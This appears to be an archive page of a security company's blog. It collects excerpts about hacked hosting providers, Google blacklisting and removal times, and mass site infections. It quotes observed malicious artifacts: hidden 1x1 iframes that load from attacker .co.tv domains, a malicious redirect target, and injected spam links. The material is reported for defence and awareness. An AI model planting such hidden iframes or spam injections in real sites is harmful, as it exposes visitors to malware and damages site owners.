Web Hosting Provider ServerPro Hacked, Defaced, & Blacklisted by Google

Even the pro’s are susceptible to attack. Web hosting provider ServerPro has been compromised and completely defaced. This has been ongoing for more than a few days with no resolution.

ServerPro boasts to have over 200,000 clients over a 10 year stand. Although there is no direct proof that this attack affects a wide portion of their client base, we have seen a few of their clients experiencing the same issue.

If you were to visit the site, which we recommend against, you would get the beautiful Google infection banner:

ServerPro Blacklisted by Google

Read More

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.

Read More

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 (13 hours)
  • Minimum time: 290 (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.


Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!

GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:


Read More

Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.

However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj.co.tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf.co.tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc) they are random and being mass generated.

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

Google blacklisted all the .cz.cc domains

It seems that Google just blacklisted all the sites under the .cz.cc main domain (including the nic.cz.cc, start.cz.cc and all others). In their status page Google says:

Has this site acted as an intermediary resulting in further distribution of malware?

 
Over the past 90 days, cz.cc appeared to function as an intermediary for the infection of 13788 site(s) including uniform-net.jp/, nuxi-navi.com/, flashracingonline.com/.

 
Has this site hosted malware?

 
Yes, this site has hosted malicious software over the past 90 days. It infected 47193 domain(s), including razym.ru/, discuss.com.hk/, lnk.by/.

So according to Google, they infected more than 47 thousand domains. It is interesting because in the last few months the .cc TLD has been the most used by attackers, but it seems that Google decided to just blacklist everything (probably by mistake).

You can see this warning, by checking the status page on google for any site ending in .cz.cc: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://anysite.cz.cc/ :

What is the current listing status for cz.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2907 time(s) over the past 90 days.

We will post more details if we learn back from Google.

TheWebbyAwards hacked and compromised with Blackhat SEO

The WebbyAwards web site ( www.webbyawards.com/ ) is currently hacked and compromised with Blackhat SEO. If you try to search for it on Google you will get a warning saying that “This site may be compromised”:

And if you look at the source code of the page, you will see thousands of hidden spam links in there (about selling Windows vista, buying office, etc) pointing to gl.iit.edu:8080, www.korea.edu, www.gefassembly.org, www.ncsconline.org and car.dost.gov.ph. Yes, all “important” and high PR sites (one university, two .gov sites, etc).

<a href="http://gl.iit.edu:8080/id=8085=WHERE-CAN-I-BUY-WINDOWS-7.html’>where can i buy windows 7</a>..

<a href="http://gl.iit.edu:8080/id=1974=BUY-MICROSOFT-OFFICE-2007-FOR.html">buy microsoft office 2007 for windows</a>

<a href="http://www.korea.edu/m02/m02_06_03.php?3142=Windows-Vista-Price.php’>windows vista price at targe..

<a href="http://www.gefassembly.org/administrator/modules/mod_title/mod_title.php?id=3387=COMPRAR-OFFICE-2007.aspx’>comprar office 200..

<a href="http://car.dost.gov.ph/libraries/phpgacl/.gacl.php?5656=Windows-7-Ultimate-(64-Bit).php’>cheap upgrade to windows ..

If you also search on Google for some of these terms (like “windows vista price at targe” ), you will see webby.aol.com (webbyawards.com) in the top pages already (along with some .gov and .edu web sites).

We have no details on how it was compromised yet, but we will keep you posted (if we hear back from them). If you are a site owner, take this as a reminder to make sure that all your sites are updated, using good passwords, monitored and following the best practices.


Site hacked? Infected with malware or spam? We are here to help.

Mass infections – globalpoweringgathering.com

We first detected malware from globalpoweringgathering.com almost a month ago, and posted on our blog about it. But in the last few days, we started to see a big increase in the number of sites infected with it.

We were able to catalog almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page (and it is growing each day – just yesterday it was less than 1 thousand):

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 1815 domain(s), including clonestop.com/, warseer.com/, showbiz411.com/.


Read More

CBS Money Watch / ZDnet hacked and blacklisted by Google

We are getting reports that the CBS Money Watch and some ZDNet web sites are currently distributing malware and blacklisted by Google. We are still investigating it, but if you try to visit the CBS Money watch site (moneywatch.com), you will get a warning from Google:



Read More

Ask Sucuri: How long it takes for a site to be removed from Google’s blacklist?

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “ask sucuri” answers, go here

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean, however, it is still blacklisted by Google. How long until they remove us?

This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, for the last few months we started to time how long it takes from when the review submission is requested, until the site is removed by Google. We have now timed more than 500 blacklist removals so I think we have some good numbers to back us up.

heree are the results:
Read More